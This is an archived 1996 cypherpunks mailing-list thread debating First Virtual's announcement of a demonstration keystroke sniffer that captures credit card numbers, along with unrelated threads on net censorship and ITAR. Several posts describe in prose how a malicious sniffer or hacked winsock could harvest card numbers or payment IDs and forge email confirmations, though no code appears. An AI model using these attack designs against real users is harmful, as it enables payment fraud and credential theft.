second question, I think that this is rather outside the scope of the Java
system's control. 

I guess what I'm trying to say is that there's only so much you can do to
protect people from themselves.  As with anything else, Java won't prevent
you from doing something stupid - nor IMO should it.  If that were true,
we'd all still be riding in buggies pulled by horses. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Tue, 30 Jan 1996 11:56:57 +0800
To: postmaster@fv.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <199601292257.AAA08008@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


I find this kind of marketing extremely inappropriate.  PLEASE STOP IT.

The "flaw" you describe is quite obvious.  The key issue is whether
untrusted code gets executed on your computer, and what your risk
model is.  When balancing the probable damage due to this risk against
the benefits of easily obtained software (from sources one chooses to
trust) and easy electronic commerce, at least I find that this "flaw"
is no cause for special alarm.  The risk is analogous to that posed by
computer viruses.

I detest people causing public hysteria to advance their private
commercial goals.

    Tatu Ylonen <ylo@cs.hut.fi>

------- start of forwarded message (RFC 934 encapsulation) -------
Received: from relay3.UU.NET by hutcs.cs.hut.fi with SMTP id AA23837
  (5.65c8/HUTCS-S 1.4 for <ylo@cs.hut.fi>); Mon, 29 Jan 1996 22:29:47 +0200
Received: from toad.com by relay3.UU.NET with SMTP 
	id QQaaqq05894; Mon, 29 Jan 1996 15:11:37 -0500 (EST)
Received: by toad.com id AA21824; Mon, 29 Jan 96 12:07:29 PST
Received: from zloty.fv.com by toad.com id AA21818; Mon, 29 Jan 96 12:07:22 PST
Received: from nsb.fv.com (nsb.fv.com [152.160.80.42]) by zloty.fv.com (8.7.3/8.7.3) with SMTP id MAA00050 for <cypherpunks@toad.com>; Mon, 29 Jan 1996 12:07:38 -0800 (PST)
Received: by  nsb.fv.com (4.1/SMI-4.1)
	id AA20803; Mon, 29 Jan 96 15:07:47 EST
Received: from Messages.8.5.N.CUILIB.3.45.SNAP.NOT.LINKED.nsb.fv.com.sun4.41
          via MS.5.6.nsb.fv.com.sun4_41;
          Mon, 29 Jan 1996 15:07:46 -0500 (EST)
Message-Id: <Al3GYGSMc50eQWYAdR@nsb.fv.com>
Precedence: bulk
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Sender: owner-cypherpunks@toad.com
To: cypherpunks@toad.com
Subject: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Date: Mon, 29 Jan 1996 15:07:46 -0500 (EST)

[My apologies in advance if you see several copies of this message.  I
am posting this fairly widely due to the severity and importance of the
problem described.]

As you may already have heard via the popular press, First Virtual
Holdings has developed and demonstrated a program which completely
undermines the security of every known credit-card encryption mechanism
for Internet commerce.  This is a very serious matter, and we want to
make sure that the Internet community is properly informed about the
nature of the problem that we have uncovered, and the manner in which we
have made the information known.  In this (unavoidably lengthy) post, I
will try to explain the nature of the problem and its implications for
Internet commerce.  In deference to those who are not technically
oriented, the detailed explanation of how the attack works will be the
LAST part of this message.

First of all, let me be perfectly clear about the nature of the problem
we have exposed.  It is NOT a bug in a single program, and it is
therefore NOT something that can be fixed with a "patch" or any other
kind of software upgrade.  Instead, we have demonstrated a very general
attack that undermines ALL programs that ask users to type a credit card
number into their home computer.  We have tested the program and
confirmed that it undermines the security of the credit card encryption
software from Netscape and Cybercash, and we expect that it will work
similarly for ANY future software based on the encryption of credit card
numbers on the desktop.  Quite simply, we believe that this program
demonstrates a FATAL flaw in one whole approach to Internet commerce,
and that the use of software to encrypt credit card numbers can NEVER be
made safe.  For consumers, we recommend the following simple rule:

NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

We should also be clear about the Internet commerce mechanisms that are
NOT affected by this problem.  First Virtual is unaffected because we
never ask the user to put a credit card number at risk by typing it into
a computer.  Hardware-based solutions can also be devised that are
immune to this attack, including solutions based on smart cards and
solutions based on "card swipe" machines in the home.  We believe that
current digital cash solutions are also not vulnerable to this attack,
although some variants of digital cash may be vulnerable to a similar
form of attack.  Commerce mechanisms based on the use of telephones or
fax machines to transmit credit card numbers are also unaffected by this
kind of attack.  Other proposed commerce mechanisms should, from now on,
be evaluated with this kind of attack in mind.  The bottom line: 
INTERNET COMMERCE CAN BE VERY SAFE, WITH SEVERAL DIFFERENT MECHANISMS,
BUT ENCRYPTING CREDIT CARDS ON THE DESKTOP IS NOT ONE OF THE SAFE
MECHANISMS.

It's important to understand why we have taken this step.  Obviously, as
the long-time leaders in Internet commerce, the last thing we would want
to do is to undermine general confidence in Internet commerce.  However,
we realized that many people believed that credit card encryption was a
safe and easy path to Internet commerce, and that very few people
understood how easily it could be undermined.  Upon investigation, we
were frankly startled to realize just how easy it was -- a single
programmer got the first version of our program running in about a week.
 Aside from our obvious interest in promoting our own commerce
mechanism, we felt that we had an ethical obligation to bring this
problem to the attention of the consumers, banks, and other financial
institutions who could conceivably suffer catastrophic losses if
software encryption of credit card numbers became widespread.

We also realize that we have an obligation to do everything possible to
avoid helping any unscrupulous people who might seek to utilize this
flaw for malicious purposes.  We have accordingly been extremely
responsible in how we have handled our discovery.  We first demonstrated
and explained our program to vital organizations such as CERT (the
Computer Emergency Response Team) and the ABA (American Banking
Association).  Only after many such private disclosures, none of which
revealed any defense against our technique, did we publicly disclose the
existence of this program.

In addition, we have taken several steps to "cripple" our demonstration
program, all of which will be discussed below.    Furthermore, we have
NOT made the program itself generally available.  We are currently
demonstrating it to selected financial institutions and government
agencies, and will provide copies of the program only to CERT and a few
other independent security-minded organizations.  We have also alerted
Netscape to the problem as part of their "bugs bounty" program.  At some
future date, we might conceivably distribute the program, in binary form
on CD ROM, to selected financial institutions.  The source code will
always be very closely guarded.  Unfortunately, however, the general
method of attack is extremely easy to duplicate, and we don't know of
any good way to alert the public to the problem without explaining it.

THE TECHNIQUE

Our basic approach was to write a computer program that runs undetected
while it monitors your  computer system. A sophisticated version of such
a program can intercept and analyze every  keystroke, mouse-click, and
even messages sent to your screen, but all we needed was the keystrokes.
Selectively intercepted information can be immediately and secretly
transmitted via  Internet protocols, or stored for later use.  

First Virtual's research team has built and demonstrated a particular
implementation of such a program, which only watches for credit card
numbers.  Whenever you type a credit card number into your computer --
even if you are talking to "secure" encryption software -- it captures
your card number.  Our program doesn't do anything harmful with your
credit card number, but merely announces that it has captured it.  A
malicious program of this type could quietly transmit your credit card
number to criminals without your knowledge.

The underlying problem is that the desktop -- the consumer's computer --
is not secure.  There is no way of ensuring that all software installed
on the consumer's machine can be trusted.  Given this fact, it is unwise
to trust ANY software such as a "secure" browser, because malicious
software could have easily been interposed between the user and the
trusted software.  

The bottom line for consumers is that, on personal computers,
INFORMATION IS INSECURE THE MOMENT YOU TOUCH A KEY.  We  have
dramatically proven that security  ends the moment you type sensitive
information into your computer. The vulnerability lies in the fact that
information must travel from your  keyboard, into your computer's
operating system, and then to your "secure" application. It can be
easily intercepted along the way.

This kind of insecurity is very frightening, and has implications far
beyond credit card theft.  However, credit cards embody and demonstrate
the kind of information that is MOST vulnerable to this kind of attack. 
Credit card numbers are far more vulnerable to this kind of attack than
most other forms of information because of the following particular
characteristics of credit card numbers:

- -- Credit card numbers are easily recognized by simple pattern recognition.
- -- Credit card numbers are "one way" financial instruments, with no
user-level confirmation or verification required for their use.
- -- Credit card numbers are of direct financial value.

In short, credit card numbers are an almost perfect example of how NOT
to design a payment instrument for an insecure public computer network
such as the Internet.

DETAILS:  HOW TO TOTALLY UNDERMINE SOFTWARE ENCRYPTION OF CREDIT CARDS

First Virtual's demonstration credit-card interception program, once
installed, observes every keystroke that you type, watching for credit
card numbers.  It recognizes credit card numbers with almost perfect
accuracy, because credit card numbers are specifically designed to match
a simple, self-identifying pattern, including a check digit.  Our
program is even smart about punctuation and simple editing functions, so
that nearly any credit card number that you type into your computer is
immediately recognized as such by this program.  

When our program spots a credit card number, it immediately plays a
warning sound and pops up a window on your screen, including an iconic
representation of the type of credit card that you have just entered,
along with a clear explanation of what has just happened.  The current
program works only on Microsoft Windows (Windows 3.1, Windows NT, and
Windows 95), but we believe that it would be simple to implement on
Macintosh and UNIX systems as well.  The program doesn't exploit any
"holes" or bugs in the operating system.  It uses existing, necessary
operating system facilities which are part of the published Windows API,
and which are necessary for the implementation of screen savers,
keyboard macros, and other important software packages.

First Virtual's intent is to educate the public, certainly not to
endanger it.  For that reason, our program incorporates four important
precautions intended to prevent any possibility of harm:

1)  Our program is not self-replicating.  While a malicious program
exploiting the same security flaw could easily be embedded in a virus,
spreading itself all over the world, that was not our goal.  Instead,
the program must be deliberately and manually installed on each computer
on which it is to run.  

2)  Our program always puts up an icon on your screen when it is
watching your keystrokes.  This is certainly not necessary, and it is
clear that a malicious program would be unlikely to do this.

3)  Our program is easy to remove from your computer, and even offers an
"Uninstall" button to the user.  Obviously a malicious program would
hide itself as well as possible, and make itself as hard to remove as
possible.

4)  Our program never transmits your credit card over the Internet. 
While a program using this approach could transmit your information to a
criminal in a totally untraceable manner, we would never do anything
like that.  In fact, we erase your credit card number from our program's
memory before we even tell you that we've seen it, thus making sure that
the credit card number can't even be retrieved by an inspection of our
program's memory.

It is frankly difficult to overstate the severity of the problem
demonstrated by our program.  A clever criminal could use viral
techniques to spread a malicious program based on the same approach, and
would be no more likely to be caught in the act than the authors of any
of the computer viruses that plague the world today.  Once it detects a
credit card number, a criminal program could use any of several
techniques to send that number to the original criminal without
providing any way to trace the criminal's receipt of it.  (If you're
skeptical about this claim, we'd prefer to talk with you privately, as
we've never seen the "best" methods for doing this spelled out in
public, and we would prefer to keep it that way.)  Altogether, this
means that if millions of credit card numbers were being typed into
Internet-connected personal computers, a criminal could obtain a
virtually unlimited supply of card numbers for his own use.  In fact,
for all we know this could already be happening today.  The first
visible sign of such an attack, if it were well-executed, would be a
gradual rise in the overall rate of credit card fraud.

POSSIBLE SOLUTIONS

First Virtual believes that the flaw we have uncovered is fatal.  In the
foreseeable future, all commerce schemes based on software encryption of
credit cards on the desktop are completely vulnerable to this sort of
attack.

The basic problem is that software encryption of credit cards is
predicated on the notion of "trusted software".  On the consumer
computing platforms, however, general purpose operating system
functionality makes it unwise to assume too strong a level of trust in
such software.  No operating system with anything less than
military-grade security (B2) is likely to be safe from an attack such as
this one.

This does not mean that Internet commerce is dead.  Any scheme that is
not based on self-identifying one-way financial instruments such as
credit cards will be essentially unaffected by this problem.  Moreover,
even credit cards may be made safe on the Internet using one of two
approaches:  secure hardware add-ons and the First Virtual approach.

First Virtual's Internet Payment Systems never places the consumer's
credit card number on the Internet.  Instead, the consumer provides it
to us by telephone when the account is opened.  After that, all
purchases are made using a "Virtual PIN".  Virtual PINs are essentially
Internet aliases for underlying payment mechanisms such as credit card
numbers, but with several kinds of added security.  Virtual PINs are
free-form text, with no recognizable pattern, which makes them much
harder to detect with the kind of attack we have just demonstrated. 
Moreover, Virtual PINs are only usable in conjunction with First
Virtual's unique email verification process.  No payment is made until
the consumer confirms an email query, which means that defrauding First
Virtual is a multi-step process that is extremely difficult to automate.
 (For more details, we recommend our paper, "Perils and Pitfalls of
Practical CyberCommerce", available via ftp from
ftp://ftp.fv.com/pub/nsb/fv-austin.txt.)

The bottom line, once again, for those of you who have read this far:

NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

There's simply no other way to keep credit cards safe on the net.  The
program we have demonstrated completely undermines the security of all
known programs that claim to handle credit card numbers safely on the
Internet.
- --------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com
------- end -------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Tue, 30 Jan 1996 11:44:50 +0800
To: cypherpunks@toad.com
Subject: Re: Opinion piece in NYT; responses needed
Message-ID: <199601300105.UAA18553@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Jan 1996 19:33:19 -0500, Jonathan Rochkind wrote:

>>   The New York Times, January 2, 1996, Business, p. 14
>>
>>
>>   Viewpoint: J. Walker Smith
>>
>>   Standoff in Cyberspace Gulch
>>
>>
[..]
>[I'm going to try to make myself write a letter to the NYT in response to
>that viewpoint, making some of these points I'm saying it's important to
>make, but you should too. :)  ]

Don't leave out an important point ignored by both sides of the debate
all too often (esp. by the "decency" folk): the structure of the 'net
itself (well, sort of).

It's a decentered network (or set of networks) designed to get
information to its addressee.  Data flows through several nodes and
networks until it reaches its destination.  If it can't get through
one path, it goes through the other.

This isn't just for mail but all "packets" that flow on the net: web
pages, file transfers, telnetting, etc. [A good segue to arguing
"security related to privacy can go here...]

Limiting content or access is only superficially impossible.  The
international scope of the 'net makes even agreeing to standards
impossible.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 31 Jan 1996 16:58:39 +0800
To: cypherpunks@toad.com
Subject: The FV Problem = A Press Problem
Message-ID: <ad3308ec2c0210043fb2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



This morning I read with bemusement (and amusement) the announcement of
FV's discovery of keystroke capture programs. Bemusement because we
discussed these in a Cypherpunks physical meeting a couple of years ago
(and on the list, too). Many of us even have them installed deliberately,
for error recovery.

Amusement because it looked like much ado about nothing.

Then I went out for the day--contrary to popular belief, I do occasionally
leave my Internet connection and venture outside--and happened to read the
local newspaper. There, in a major new story by Simson Garfinkel, was the
FV story plastered all over the newspaper.  FUD, indeed.

But, it occurred to me, this is just part of the larger syndrom. Simson's
article was practically written from the FV press release. While he
interviewed some "security experts," clearly the timing of his article
(this morning) and the announcement by Nathaniel of his discovery (this
morning) suggests the cozy relationship involved.

The larger syndrome is that software deals, alliances, mergers, and
problems are all based on hype. Nathaniel Borenstein issues press releases,
Sameer Parekh issues press releases, and maybe even I would issue press
releases if only I knew how to.

Every day the business news is dominated by stories of alliances and
partnerships between Microsoft, MCI, Intel, Apple, Sun, Verifone, DirectTV,
Newscorp, Sprint, AT&T, BT&T, CT&T, and all the rest. And a lot of it is
hype, posturing. Much of the supposed future will never emerge (anyone
remember Satellite Business Systems?)

Journalists seem to love this, because the press releases write the
stories. Companies like it, too, because they can get free newspaper space.
Everyone is scratching each other's back.

And those wacky Cypherpunks, with their t-shirts and their strange ideas,
are always good for a quick quote, too.

--Tim May



Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Wed, 31 Jan 1996 23:52:30 +0800
To: "'Vladimir Z. Nuri'" <vznuri@netcom.com>
Subject: RE: more RANTING about NSA-friendly cpunks
Message-ID: <01BAEEB4.B4C45680@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



From:          Vladimir Z. Nuri, aka Agent Provocateur

no, your own fear is harming you. no law requires that you be in fear
of it (some may try, but that is not a law that can be written). 
that is the point of the law, that is the intent of it. 
..............................................................................................

"The Law" is using psychological warfare in its attempts to keep stray cats in line.  This is because they haven't thoroughly considered the nature of the circumstance within which they are attempting to operate  - the condition of respect for the individual and a support for the rights of liberty.

They too are afraid.  They also are moved by the fear of threats like "the four horsemen".  They are so focused on this fear that it overrides their "Prime Directive", which is to uphold the above mentioned principles.   

They use the threats of the law to inspire complicity, but they do have the resources to carry out their threats.   While an agency like the NSA is sufficiently well-funded where they can concentrate on pursuing their case against a target, a company or individual is engaged in creating their income at the same time that they must also use a portion of these resources to defend themselves in court (as well as defend their public image).   

It would be a noble project to challenge something like the ITAR in a court of law, where the issues and flaws of the government's attitudes & methods could be brought out in detail, dashed to the ground by brilliant reasoning and argument, winning a battle not only for privacy, but for the lofty goal of individual sovereignty.   But it would take a lot of time, some very able talents, and a lot of cash; most lone cryptographers would not be able to do these two things at once (making a living while also fighting the dragon).

It's easy for you, Vlad, to chastise others for being cowardly, when you have nothing to lose (and only incendiarism to offer).  Those who are enjoined to take action must calculate how much they can afford to invest in such an expensive venture.   You asked me in an earlier post how I could distinguish just any poster to the list from someone who might be an "agent provocateur".   By this:  they only provoke action from others - encouraging, cajoling, shaming, pushing them into thoughtless action, without themselves taking on any of the risk involved, without themselves facing any of the dangers but only getting others to do so.

The government does operate on support, and criticism of their policies lets them know where they stand (unsupported).  But it also communicates to those in office ideas which they find it difficult to consider (or outrightly disdain).  It serves to educate them as well, these controversial meetings and discussions:   it reveals to them how just how educated everyone is on the matter of their rights under government, on the matter of how they see themselves in terms of self-determination, and on how they are each prepared to act accordingly.    Public discussions have the value of education for those govmt representatives who do not consider thoroughly the implications of their policies, who are not clear on concepts of privacy.

It would be great to have a show of fireworks in a court of law.   But (and I don't mean to begin a long thread of discussion on this) I myself would wonder why the Supreme Court wouldn't already be defending us from the attacks against basic ideals like personal privacy.   There are already in existence a body of "authorities" assigned to the task of preserving the Constitution, educated in Law and the principles for which this nation stands.   They are the ones whom I would address with inquiries over negligence & lilly-livered, yellow-bellied non-involvement.  I guess someone has to bring the matter to their attention, bringing up charges of injustice for their wisdom to cogitate upon.   Nevertheless, it is to them, who are in charge of maintaining consistency to the ideals within The Constitution, that I would ask, "why have you forsaken us"?









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 30 Jan 1996 16:09:19 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: [rant] A thought on filters and the V-Chip
Message-ID: <v02140a06ad3333c01cc6@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 1/29/96, Duncan Frissell wrote:

>What parents are attempting to do when they restrain their children's access
>to "sex and drugs and rock and roll" (or Republicanism for that matter) is
>to mediate their "spiritual" environment to keep them from becoming
>hardened.  They know the kids will grow up, they just want them to grow up
>in a nice way.

Another way of looking at it is that the parents want to raise their kids
to be mindless types who do not force their parents to actually question
their own mindsets. If they can program their kids into brainwashed clones
of themselves, there is no need to think about other belief systems.

>Note that in spite of what liberals might think, fundamentalist Christians
>are less likely to divorce,

probably due to the fact that divorce is a null-concept when applied to
fundamentalist Christians (ie: It is not something that they "can do" under
their mindset).

>less likely to report spousal beatings,

Is this "less likely to report spousal beatings" or "less likely to HAVE
spousal beatings TO REPORT"? - If the former than again it is due to having
a mindset that says that it is ok to beat your spouse (or be beaten by
him/her) while if it is the later then that is a positive aspect of their
mindset/belief-system.

>less likely to kill themselves,

Again mindset - if you follow the rules and be a good boy/girl you will be
rewarded after your death. Killing yourself is a "bad" thing and against
the rules thus is not something you do if you want your reward after a
"natural" death.

>and more likely to measure high personal satisfaction levels on standard
>psychological tests than are, say, readers of The Nation.

How culturally neutral are these tests and what are they supposed to be
measuring. Also are they designed to produce/force a designated result (it
is easy to generate a desired result or prevent an undesired result by
designing the questions to get specific types of answers). Note: I am not
questioning your claim but only asking if the claim has any relevance to
the real world as opposed to the world as you want it to be portrayed by
the test results.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 30 Jan 1996 20:02:33 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <2.2.32.19960130104053.009ba398@panix.com>
Message-ID: <Pine.ULT.3.91.960130031523.20022A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Jan 1996, Duncan Frissell wrote:

> At 04:53 AM 1/28/96 +0100, Alex de Joode wrote:
> >
> >Belgian TV (the dutch language channel) has a page on teletext (Ceefax)
> >[I don't think US tv has that feature] stating that the French backbone
> >is thinking about blocking sites that provide information that they deem
> >ethicly unacceptable, like sites that promote the denial of Konzentrations
> >Lagers, the extreme right, pornografic and pedophile sites.
> >
> >[page 128 BRTN, for those who can receive BRT]
> 
> What about "the extreme left."  Don't those people deserve to be blocked
> too?  And how about US radio stations on RealAudio 2.0.  Cultural 
> Imperialism.
> 
> So how do we overcome these "backbone blocking" maneuvers?

Simple. It's been done.

We will organize reasonable mirrors of any site not involved in overt
law-breaking that is actively blocked by any "Major Indistrial Democracy." 
I don't think I'm quite ready to take on Cuba, China, North Korea, etc. 
Disk space and bandwidth are increasingly cheap these days.

Go ahead. Make my day. You want to firewall every educational and
non-profit organization in what's left of the free world? 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 31 Jan 1996 04:09:19 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <ad32cd9601021004af4e@[132.162.233.188]>
Message-ID: <310E0D83.111A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein wrote:
> This is wrong on two main counts:  the ID's are harder to find than
> credit cards, and they're not as directly useful as credit cards.  These
> two facts combine to make the attack more or less irrelevant to FV.
> 
> First of all, the Virtual PIN (FV-ID) is much harder to extract from a
> large data stream because it is arbitrary text, unlike credit card
> numbers, which are self-identifying.
> 
> Second, a Virtual PIN is not a one-way payment instrument, like a credit
> card.  To use FV to buy something on your credit card, you need to
> combine the theft of a Virtual PIN with the compromise of the buyer's
> email account, for confirming transactions.  We all know this can be
> done -- we actually even spell out how to do it in our paper, "Perils
> and Pitfalls of Practical CyberCommerce" -- but it is very hard to
> combine these steps on the large scale that would be needed to mount an
> automated attack, which is the most serious threat to the credit card
> system.

  It would not be much harder than the demonstrated keyboard attack
to create a hacked version of winsock that would implement an
attack against First Virtual.  If the attacker had a list of web
pages that accept FV payments it would be very easy to collect
the ID numbers.  There is no need to attack the large datastream
of keyboard input when the search can be easily narrowed.  Since
FV doesn't use encryption the attack could easily be implemented
in winsock, making it independent of any client software.  A version
that infected the win95 IP stack could be quite effective.  The list
of FV accepting sites would be easily obtainable via a query of
altavista.  Since the infected system is on the internet and has
to periodically send its results to the attacker, it could download
an updated list of FV pages at the same time.  

  Attacking the e-mail verification step of the FV system could also
be accomplished via a hacked winsock.  A bit of POP3 aware code
in the winsock could intercept the verification messages and keep
the e-mail client from ever seeing them.  It could automatically
generate "Yes" responses for all such messages.

  I believe that FV is just as vulnerable to these types of
attacks as any of the encryption based credit card schemes, if
not more so.  The thing that really protects FV is that it can
only be used to buy bit, not real goods, and the bad guys don't
generally care about stealing bits.  This is also what makes FV
not generally useful to people who want to shop over the internet.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Nobody" <mixmaster@anon.alias.net>
Date: Tue, 30 Jan 1996 19:03:06 +0800
To: jrochkin@cs.oberlin.edu.cypherpunks@toad.com
Subject: None
Message-ID: <199601301025.EAA17459@fuqua.fiftysix.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <ad32cd9601021004af4e@[132.162.233.188]> jrochkin@cs.oberlin.edu (Jonathan Rochkind) writes:
> 3)  I believe that FV works by assigning the user some sort of id number.
> They send the id accross the net, FV has a database with "FV-ID" <->
> credit-card-number correspondences, the merchant sends FV the id, FV bills
> your card and pays the merchant.  Now, if I'm correct about how FV works,
> we could clearly write a program that searches your HD for FVs data files,
> extracts your FV-ID from it, and steals it.  It could be a virus, it could
> send the FV accross the net, whatever.  We could then use your FV-ID to
> make fraudulently make purchases through the FV system that would be billed
> to you.  This is essentially the same attack as FV "demonstrates" against
> software encrypted credit cards over the net: that is, the "You have an
> insecure system and if we can put evil software on it, we can get you."
> attack.

This sounds like a fatal security flaw in FV's system!  We need to
publicize this fact widely to prevent innocent people from using their
FV accounts from computers or over the network.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Wed, 31 Jan 1996 04:12:16 +0800
To: cypherpunks@toad.com
Subject: Re: Apology and clarification
In-Reply-To: <cl3ShvGMc50eEWY1pL@nsb.fv.com>
Message-ID: <310E0EBE.30FD3BCC@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein wrote:
> 
> What we at FV have done is to demonstrate how easy it is to develop an
> FULLY AUTOMATED attack that undermines the security of all
> software-based credit card commerce schemes.

You have done no such thing.  You have written *one component* of that
attack, and the easiest part of it at that.

Combine it with a virus, or self-replicating worm, and demonstrate that
it is immune to all known virus checkers, and *then* you will have
spoken the truth when you say you have "demonstrated" anything.

Heck, combine it with a screensaver as a trojan horse *and* collect a
few hundred credit card numbers and *then* you will have demonstrated
something.

You've demonstrated nothing but your ability to write press releases,
and print out some messages when fully-cooperating users submit to your
"test."

You may think this is nitpicking, but the fact is, you're assuming that
the implicit cooperation of some vast number of users in running your
program is easy to obtain.  I disagree with this assumption.  If this
assumption were true, then viruses would be a much bigger problem than
the mere annoyance that they are today.

> It is the automated aspect that separates it from all of the
> "dumpster-diving" attacks on credit card numbers which have previously
> been widely discussed, because it provides a path to large-scale fraud
> that has never been publicly discussed before, to my knowledge.  The
> key "invention" in our approach is to integrate several techniques
> that are already well-known (in this community) into an automated
> attack that we consider to be devastating to commerce systems based on
> software-encrypted credit cards.

This is the same kind of vaccuous reasoning that leads to things like
the "concryption" patent.  You have invented nothing.  You've combined
the painfully obvious and written a fearmongering rant about it.

*Computers* provide a path to large-scale fraud.  So does the printing
press.  So does the telephone, and the postal system.  So what.  You
still haven't proven that it's easy.

> This is a very real threat.  If you think we're just re-hashing keyboard
> sniffers, you haven't yet understood what we're demonstrating.  The real
> threat is the traceless theft of millions of credit card numbers by a
> single easily mounted automated attack.

With as much work as you've put into this, someone could write a
Microsoft Word document which when opened, would start dumping the
contents of your hard disk into the mail.  

The knee-jerk moral to *that* is to never store non-public information
on a computer that has a network connected to it.

However, reasonable people assess that risk, and decide to do it anyway,
because the benefits outweigh the risk.

> So here's the factual claim, to be proven or disproven:  One good
> programmer, in less than a month, can write a program

Come now, right off the bat you know that no assertion taking that form
can be *dis*proven.

> that will spread itself around the net, collect an unlimited number
> of credit card numbers, and get them back to the program's author by
> non-traceable mechanisms.  Does anyone on this list doubt that this 
> is true?

It's not a matter of possibility.  It's a matter of probability, and
risk management.  It's unlikely enough that I'm not afraid of using my
credit card on the net.  Tell me my credit card number, and I'll change
my mind.

> If not, I think it's worth noting that this fact was previously
> completely unknown to the bankers and businessmen who are putting
> large sums of money at risk on the net.  The only way to get the
> message to those communities is with a very visible public
> announcement of the kind you saw yesterday.

All a banker needs to know is the amount of risk associated with the
thing in which they are investing; they don't need to know how keyboard
sniffers work.  I don't believe you've demonstrated anything that
changes the risk model that they have presumably already gotten from
their flock of experts who they no doubt employed before investing in
the net (experts who also no doubt know all about how viruses work,
thank you very much.)

	== Jamie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Wed, 31 Jan 1996 18:09:38 +0800
To: Nathaniel Borenstein <cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Al3GYGSMc50eQWYAdR@nsb.fv.com>
Message-ID: <199601300934.EAA02798@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


This sounds like nothing but a glorified keystroke sniffer like xkey.

More importantly, however, if my system did get compromised, I would
have bigger worries than my credit card number.  I give my credit card
number out to people every day, but no one knows my PGP or ssh
passphrases, for example.

You may argue that many people don't have source code to their OS's,
so that viruses can spread more easily to them than to me.  Well, many
people don't do backups, either.  Ask most people if they would rather
divulge their credit card numbers or loose the entire contents of
their hard drives, and I think the answer will most likely be the
credit card number disclosure.

This article looks like a cheap attention getting device for FV to get
some free publicity.  I am not impressed.

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 23:50:43 +0800
To: cypherpunks@toad.com
Subject: Apology and clarification
Message-ID: <cl3ShvGMc50eEWY1pL@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


First of all, I believe that I owe the cypherpunk community an apology
for an error in judgement on my part.  The message that I sent out
yesterday regarding our demonstrations of a newly-discovered security
threat was the exact same text that I  sent to a  far less technical
audience.  As such, I understand that many people on this list found the
tone of my message to be insulting and offensive.  I apologize, and I
certainly didn't mean to insult anyone's intelligence.  

Having said that, please cut me a break.  If you read my message as
saying "FV has just invented keystroke sniffing" you've completely
missed the real attack here.  If you really think I'd throw away my
reputation on a bogus claim like that, you're insulting *my*
intelligence.   My (charitable?) take on it is that a lot of people were
so put off by the tone of my mass-market message that they leapt to the
quick but erroneous conclusion that there was no underlying content. 
There is.

The threat is NOT from keystroke sniffing per se, and we're certainly
not claiming to have invented keystroke sniffing.  However, we do have
to *explain* keystroke sniffing in the public announcement, because it
is a *part* of our attack, and most of the public does NOT already know
that it's possible.

